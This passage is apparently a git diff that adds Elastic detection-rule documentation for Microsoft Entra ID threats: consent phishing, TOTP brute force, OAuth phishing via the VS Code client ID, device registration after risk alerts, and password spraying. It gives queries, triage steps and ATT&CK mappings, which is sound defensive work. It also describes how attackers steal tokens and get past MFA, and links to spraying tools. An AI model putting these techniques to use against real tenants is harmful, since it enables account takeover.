in the future. +- Report any malicious applications to Microsoft to protect other tenants. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.auditlogs" and + ( + azure.auditlogs.operation_name:"Consent to application" + or event.action:"Consent to application" + ) + and event.outcome: "success" + and azure.auditlogs.properties.additional_details.key: "AppId" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc new file mode 100644 index 0000000000..435c545067 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc @@ -0,0 +1,199 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-mfa-totp-brute-force-attempts]] +=== Microsoft Entra ID MFA TOTP Brute Force Attempts + +Identifies brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. This rule detects high frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attemopt to brute-force TOTP codes by generating several sessions and attempt to guess the correct code. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.oasis.security/resources/blog/oasis-security-research-team-discovers-microsoft-azure-mfa-bypass +* https://learn.microsoft.com/en-us/entra/identity/ +* https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID MFA TOTP Brute Force Attempts* + + +This rule detects brute force attempts against Azure Entra multi-factor authentication (MFA) Time-based One-Time Password (TOTP) verification codes. It identifies high-frequency failed TOTP code attempts for a single user in a short time-span with a high number of distinct session IDs. Adversaries may programmatically attempt to brute-force TOTP codes by generating several sessions and attempting to guess the correct code. + + +*Possible Investigation Steps:* + + + - Check the source addresses associated with the failed TOTP attempts. + - Determine if the source IP address is consistent with the user’s typical login locations. + - Look for unusual geographic patterns or anomalous IP addresses (e.g., proxies, VPNs, or locations outside the user’s normal activity). + - Review the error code associated with the failed attempts. This can help identify if the failures are due to incorrect TOTP codes or other issues. + - Verify that that auth metho reported is `OAth` as it indicates the use of TOTP codes. + - Pivot into signin logs for the target user and check if auth via TOTP was successful which would indicate a successful brute force attempt. + - Review conditional access policies applied to the user or group as reported by the sign-in logs. + - Analyze the client application ID and display name to determine if the attempts are coming from a legitimate application or a potentially malicious script. + - Adversaries may use legitimate FOCI applications to bypass security controls or make login attempts appear legitimate. + - Review the resource ID access is being attempted against such as MyApps, Microsoft Graph, or other resources. This can help identify if the attempts are targeting specific applications or services. + - The correlation IDs or session IDs can be used to trace the authentication attempts across different logs or systems. Note that for this specific behavior, unique session ID count is high and could be challenging to correlate. + + +*False Positive Analysis:* + + + - Verify if the failed attempts could result from the user’s unfamiliarity with TOTP codes or issues with device synchronization. + - Check if the user recently switched MFA methods or devices, which could explain multiple failures. + - Determine if this is whitebox testing or a developer testing MFA integration. + + +*Response and Remediation:* + + + - If proven malicious, lock the affected account temporarily to prevent further unauthorized attempts. + - Notify the user of suspicious activity and validate their access to the account. + - Reset passwords and MFA settings for the affected user to prevent unauthorized access while communicating with the user. + - Ensure conditional access policies are configured to monitor and restrict anomalous login behavior. + - Consider a different MFA method or additional security controls to prevent future bypass attempts. + - Implement additional monitoring to track high-frequency authentication failures across the environment. + - Audit historical logs for similar patterns involving other accounts to identify broader threats. + - Provide guidance on the secure use of MFA and the importance of recognizing and reporting suspicious activity. + + +==== Setup + + + +*Required Entra ID Sign-In Logs* + +This rule requires the Entra ID sign-in logs via the Azure integration be enabled. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Entra ID logs integration. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* metadata _id, _version, _index + +| where + // filter for Entra Sign-in Logs + event.dataset == "azure.signinlogs" + and azure.signinlogs.operation_name == "Sign-in activity" + and azure.signinlogs.properties.user_type == "Member" + + // filter for MFA attempts with OATH conditional access attempts or TOTP + and azure.signinlogs.properties.mfa_detail.auth_method == "OATH verification code" + + // filter on failures only from brute-force attempts + and ( + ( + azure.signinlogs.result_signature == "FAILURE" and + azure.signinlogs.result_description == "Authentication failed during strong authentication request." + ) or azure.signinlogs.properties.status.error_code == 500121 + ) + +| stats + Esql.event_count = count(*), + Esql.azure_signinlogs_properties_session_id_count_distinct = count_distinct(azure.signinlogs.properties.session_id), + Esql.source_address_values = values(source.address), + Esql.azure_tenant_id_valuues = values(azure.tenant_id), + Esql_priv.azure_identity_values = values(azure.signinlogs.identity), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_authentication_protocol_values = values(azure.signinlogs.properties.authentication_protocol), + Esql.azure_signinlogs_properties_client_app_used_values = values(azure.signinlogs.properties.client_app_used), + Esql.azure_signinlogs_properties_client_credential_type_values = values(azure.signinlogs.properties.client_credential_type), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_correlation_id_values = values(azure.signinlogs.properties.correlation_id), + Esql.azure_signinlogs_properties_is_interactive_values = values(azure.signinlogs.properties.is_interactive), + Esql.azure_signinlogs_properties_mfa_detail_auth_method_values = values(azure.signinlogs.properties.mfa_detail.auth_method), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_risk_detail_values = values(azure.signinlogs.properties.risk_detail), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_original_request_id_values = values(azure.signinlogs.properties.original_request_id), + Esql.user_id_values = values(user.id) + by user.id + +| where Esql.event_count >= 20 and Esql.azure_signinlogs_properties_session_id_count_distinct >= 10 + +| keep + Esql.event_count, + Esql.azure_signinlogs_properties_session_id_count_distinct, + Esql.source_address_values, + Esql.azure_tenant_id_valuues, + Esql_priv.azure_identity_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_authentication_protocol_values, + Esql.azure_signinlogs_properties_client_app_used_values, + Esql.azure_signinlogs_properties_client_credential_type_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_correlation_id_values, + Esql.azure_signinlogs_properties_is_interactive_values, + Esql.azure_signinlogs_properties_mfa_detail_auth_method_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_risk_detail_values, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_original_request_id_values, + Esql.user_id_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc new file mode 100644 index 0000000000..aee887ed93 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-oauth-phishing-via-visual-studio-code-client]] +=== Microsoft Entra ID OAuth Phishing via Visual Studio Code Client + +Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID OAuth Phishing via Visual Studio Code Client* + + + +*Possible investigation steps* + + +- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. +- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. +- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. +- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. +- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. +- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. +- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration. + + +*False positive analysis* + + +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. +- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. +- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. +- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`. +- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. + + +*Response and remediation* + + +- Block the source IP address in `source.ip` if determined to be malicious. +- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update conditional access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.signinlogs" and +event.action: "Sign-in activity" and +event.outcome: "success" and +( + azure.signinlogs.properties.resource_display_name: "Microsoft Graph" or + azure.signinlogs.properties.resource_id: "00000003-0000-0000-c000-000000000000" +) and ( + azure.signinlogs.properties.app_id: "aebc6443-996d-45c2-90f0-388ff96faa56" or + azure.signinlogs.properties.app_display_name: "Visual Studio Code" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc new file mode 100644 index 0000000000..0f49e7b4fb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-protection-alert-and-device-registration]] +=== Microsoft Entra ID Protection Alert and Device Registration + +Identifies sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-azure.identity_protection-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Protection Logs +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Persistence + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Protection Alert and Device Registration* + + + +*Possible investigation steps* + + +- Identify the Risk Detection that triggered the event. A list with descriptions can be found https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection[here]. +- Identify the user account involved and validate whether the suspicious activity is normal for that user. + - Consider the source IP address and geolocation for the involved user account. Do they look normal? + - Consider the device used to sign in. Is it registered and compliant? +- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and device conditions. +- Consider the context of the user account and whether the activity is expected. For example, if the user is a developer or administrator, they may have legitimate reasons for accessing resources from various locations or devices. +- A Microsoft Entra ID Protection alert may be triggered by legitimate activities such as password resets, MFA changes, or device registrations. If the user is known to perform these actions regularly, it may not indicate a compromise. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=5m +[any where event.dataset == "azure.identity_protection"] by azure.identityprotection.properties.user_principal_name +[any where event.dataset == "azure.auditlogs" and event.action == "Register device"] by azure.auditlogs.properties.initiated_by.user.userPrincipalName + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc new file mode 100644 index 0000000000..538b0ef2a6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc @@ -0,0 +1,164 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-rare-authentication-requirement-for-principal-user]] +=== Microsoft Entra ID Rare Authentication Requirement for Principal User + +Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Rare Authentication Requirement for Principal User* + + +Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. + +**This is a New Terms rule that focuses on first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication requirement `azure.signinlogs.properties.authentication_requirement` in the last 14-days.** + + +*Possible investigation steps* + + +- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. +- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. +- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. +- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. +- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. +- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. +- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration. + + +*False positive analysis* + + + +*Common benign scenarios* + +- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. +- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. +- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. + + +*How to reduce false positives* + +- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. +- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`. +- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. + + +*Response and remediation* + + + +*Immediate actions* + +- Block the source IP address in `source.ip` if determined to be malicious. +- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. +- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. +- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. + + +*Long-term mitigation* + +- Implement a zero-trust security model by enforcing least privilege access and continuous authentication. +- Regularly review and update conditional access policies to ensure they are effective against evolving threats. +- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`. +- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks. +- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.signinlogs" and event.category: "authentication" + and azure.signinlogs.properties.user_type: "Member" + and azure.signinlogs.properties.authentication_details.authentication_method: "Password" + and not azure.signinlogs.properties.device_detail.browser: * + and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" + and not azure.signinlogs.properties.authentication_requirement: "multiFactorAuthentication" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc new file mode 100644 index 0000000000..5e468c6886 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity.asciidoc @@ -0,0 +1,265 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-sign-in-brute-force-activity]] +=== Microsoft Entra ID Sign-In Brute Force Activity + +Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 15m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.proofpoint.com/us/blog/threat-insight/attackers-unleash-teamfiltration-account-takeover-campaign +* https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/ +* https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/ +* https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Sign-In Brute Force Activity* + + +This rule detects brute-force authentication activity in Entra ID sign-in logs. It classifies failed sign-in attempts into behavior types such as password spraying, credential stuffing, or password guessing. The classification (`bf_type`) helps prioritize triage and incident response. + + +*Possible investigation steps* + + +- Review `bf_type`: Determines the brute-force technique being used (`password_spraying`, `credential_stuffing`, or `password_guessing`). +- Examine `user_id_list`: 